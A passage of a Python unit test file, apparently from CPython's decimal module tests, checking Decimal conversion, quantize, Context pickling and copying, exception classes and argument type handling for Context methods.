Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
context.create_decimal_from_float,
math.pi
)
self.assertEqual(repr(context.create_decimal_from_float(-0.0)),
"Decimal('-0')")
self.assertEqual(repr(context.create_decimal_from_float(1.0)),
"Decimal('1')")
self.assertEqual(repr(context.create_decimal_from_float(10)),
"Decimal('10')")
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
c = Context(Emax=99999, Emin=-99999)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01')),
Decimal('7.34')
)
self.assertEqual(
Decimal('7.335').quantize(Decimal('.01'), rounding=ROUND_DOWN),
Decimal('7.33')
)
self.assertRaises(
InvalidOperation,
Decimal("10e99999").quantize, Decimal('1e100000'), context=c
)
c = Context()
d = Decimal("0.871831e800")
x = d.quantize(context=c, exp=Decimal("1e797"), rounding=ROUND_DOWN)
self.assertEqual(x, Decimal('8.71E+799'))
def test_complex(self):
Decimal = self.decimal.Decimal
x = Decimal("9.8182731e181273")
self.assertEqual(x.real, x)
self.assertEqual(x.imag, 0)
self.assertEqual(x.conjugate(), x)
x = Decimal("1")
self.assertEqual(complex(x), complex(float(1)))
self.assertRaises(AttributeError, setattr, x, 'real', 100)
self.assertRaises(AttributeError, setattr, x, 'imag', 100)
self.assertRaises(AttributeError, setattr, x, 'conjugate', 100)
self.assertRaises(AttributeError, setattr, x, '__complex__', 100)
def test_named_parameters(self):
D = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
Overflow = self.decimal.Overflow
xc = Context()
xc.prec = 1
xc.Emax = 1
xc.Emin = -1
with localcontext() as c:
c.clear_flags()
self.assertEqual(D(9, xc), 9)
self.assertEqual(D(9, context=xc), 9)
self.assertEqual(D(context=xc, value=9), 9)
self.assertEqual(D(context=xc), 0)
xc.clear_flags()
self.assertRaises(InvalidOperation, D, "xyz", context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
xc.clear_flags()
self.assertEqual(D(2).exp(context=xc), 7)
self.assertRaises(Overflow, D(8).exp, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
xc.clear_flags()
self.assertEqual(D(2).ln(context=xc), D('0.7'))
self.assertRaises(InvalidOperation, D(-1).ln, context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D(0).log10(context=xc), D('-inf'))
self.assertEqual(D(-1).next_minus(context=xc), -2)
self.assertEqual(D(-1).next_plus(context=xc), D('-0.9'))
self.assertEqual(D("9.73").normalize(context=xc), D('1E+1'))
self.assertEqual(D("9999").to_integral(context=xc), 9999)
self.assertEqual(D("-2000").to_integral_exact(context=xc), -2000)
self.assertEqual(D("123").to_integral_value(context=xc), 123)
self.assertEqual(D("0.0625").sqrt(context=xc), D('0.2'))
self.assertEqual(D("0.0625").compare(context=xc, other=3), -1)
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0").compare_signal, D('nan'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.01").max(D('0.0101'), context=xc), D('0.0'))
self.assertEqual(D("0.2").max_mag(D('-0.3'), context=xc),
D('-0.3'))
self.assertEqual(D("0.02").min(D('-0.03'), context=xc), D('-0.0'))
self.assertEqual(D("0.02").min_mag(D('-0.03'), context=xc),
D('0.0'))
self.assertEqual(D("0.2").next_toward(D('-1'), context=xc), D('0.1'))
xc.clear_flags()
self.assertRaises(InvalidOperation,
D("0.2").quantize, D('1e10'), context=xc)
self.assertTrue(xc.flags[InvalidOperation])
self.assertFalse(c.flags[InvalidOperation])
self.assertEqual(D("9.99").remainder_near(D('1.5'), context=xc),
D('-0.5'))
self.assertEqual(D("9.9").fma(third=D('0.9'), context=xc, other=7),
D('7E+1'))
self.assertRaises(TypeError, D(1).is_canonical, context=xc)
self.assertRaises(TypeError, D(1).is_finite, context=xc)
self.assertRaises(TypeError, D(1).is_infinite, context=xc)
self.assertRaises(TypeError, D(1).is_nan, context=xc)
self.assertRaises(TypeError, D(1).is_qnan, context=xc)
self.assertRaises(TypeError, D(1).is_snan, context=xc)
self.assertRaises(TypeError, D(1).is_signed, context=xc)
self.assertRaises(TypeError, D(1).is_zero, context=xc)
self.assertFalse(D("0.01").is_normal(context=xc))
self.assertTrue(D("0.01").is_subnormal(context=xc))
self.assertRaises(TypeError, D(1).adjusted, context=xc)
self.assertRaises(TypeError, D(1).conjugate, context=xc)
self.assertRaises(TypeError, D(1).radix, context=xc)
self.assertEqual(D(-111).logb(context=xc), 2)
self.assertEqual(D(0).logical_invert(context=xc), 1)
self.assertEqual(D('0.01').number_class(context=xc), '+Subnormal')
self.assertEqual(D('0.21').to_eng_string(context=xc), '0.21')
self.assertEqual(D('11').logical_and(D('10'), context=xc), 0)
self.assertEqual(D('11').logical_or(D('10'), context=xc), 1)
self.assertEqual(D('01').logical_xor(D('10'), context=xc), 1)
self.assertEqual(D('23').rotate(1, context=xc), 3)
self.assertEqual(D('23').rotate(1, context=xc), 3)
xc.clear_flags()
self.assertRaises(Overflow,
D('23').scaleb, 1, context=xc)
self.assertTrue(xc.flags[Overflow])
self.assertFalse(c.flags[Overflow])
self.assertEqual(D('23').shift(-1, context=xc), 0)
self.assertRaises(TypeError, D.from_float, 1.1, context=xc)
self.assertRaises(TypeError, D(0).as_tuple, context=xc)
self.assertEqual(D(1).canonical(), 1)
self.assertRaises(TypeError, D("-1").copy_abs, context=xc)
self.assertRaises(TypeError, D("-1").copy_negate, context=xc)
self.assertRaises(TypeError, D(1).canonical, context="x")
self.assertRaises(TypeError, D(1).canonical, xyz="x")
def test_exception_hierarchy(self):
decimal = self.decimal
DecimalException = decimal.DecimalException
InvalidOperation = decimal.InvalidOperation
FloatOperation = decimal.FloatOperation
DivisionByZero = decimal.DivisionByZero
Overflow = decimal.Overflow
Underflow = decimal.Underflow
Subnormal = decimal.Subnormal
Inexact = decimal.Inexact
Rounded = decimal.Rounded
Clamped = decimal.Clamped
self.assertTrue(issubclass(DecimalException, ArithmeticError))
self.assertTrue(issubclass(InvalidOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, DecimalException))
self.assertTrue(issubclass(FloatOperation, TypeError))
self.assertTrue(issubclass(DivisionByZero, DecimalException))
self.assertTrue(issubclass(DivisionByZero, ZeroDivisionError))
self.assertTrue(issubclass(Overflow, Rounded))
self.assertTrue(issubclass(Overflow, Inexact))
self.assertTrue(issubclass(Overflow, DecimalException))
self.assertTrue(issubclass(Underflow, Inexact))
self.assertTrue(issubclass(Underflow, Rounded))
self.assertTrue(issubclass(Underflow, Subnormal))
self.assertTrue(issubclass(Underflow, DecimalException))
self.assertTrue(issubclass(Subnormal, DecimalException))
self.assertTrue(issubclass(Inexact, DecimalException))
self.assertTrue(issubclass(Rounded, DecimalException))
self.assertTrue(issubclass(Clamped, DecimalException))
self.assertTrue(issubclass(decimal.ConversionSyntax, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionImpossible, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, InvalidOperation))
self.assertTrue(issubclass(decimal.DivisionUndefined, ZeroDivisionError))
self.assertTrue(issubclass(decimal.InvalidContext, InvalidOperation))
class CPythonAPItests(PythonAPItests):
decimal = C
class PyPythonAPItests(PythonAPItests):
decimal = P
class ContextAPItests(unittest.TestCase):
def test_none_args(self):
Context = self.decimal.Context
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
c1 = Context()
c2 = Context(prec=None, rounding=None, Emax=None, Emin=None,
capitals=None, clamp=None, flags=None, traps=None)
for c in [c1, c2]:
self.assertEqual(c.prec, 28)
self.assertEqual(c.rounding, ROUND_HALF_EVEN)
self.assertEqual(c.Emax, 999999)
self.assertEqual(c.Emin, -999999)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
assert_signals(self, c, 'flags', [])
assert_signals(self, c, 'traps', [InvalidOperation, DivisionByZero,
Overflow])
@cpython_only
def test_from_legacy_strings(self):
import _testcapi
c = self.decimal.Context()
for rnd in RoundingModes:
c.rounding = _testcapi.unicode_legacy_string(rnd)
self.assertEqual(c.rounding, rnd)
s = _testcapi.unicode_legacy_string('')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
s = _testcapi.unicode_legacy_string('ROUND_\x00UP')
self.assertRaises(TypeError, setattr, c, 'rounding', s)
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
Context = self.decimal.Context
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
c = Context()
e = pickle.loads(pickle.dumps(c, proto))
self.assertEqual(c.prec, e.prec)
self.assertEqual(c.Emin, e.Emin)
self.assertEqual(c.Emax, e.Emax)
self.assertEqual(c.rounding, e.rounding)
self.assertEqual(c.capitals, e.capitals)
self.assertEqual(c.clamp, e.clamp)
self.assertEqual(c.flags, e.flags)
self.assertEqual(c.traps, e.traps)
# Test interchangeability
combinations = [(C, P), (P, C)] if C else [(P, P)]
for dumper, loader in combinations:
for ri, _ in enumerate(RoundingModes):
for fi, _ in enumerate(OrderedSignals[dumper]):
for ti, _ in enumerate(OrderedSignals[dumper]):
prec = random.randrange(1, 100)
emin = random.randrange(-100, 0)
emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
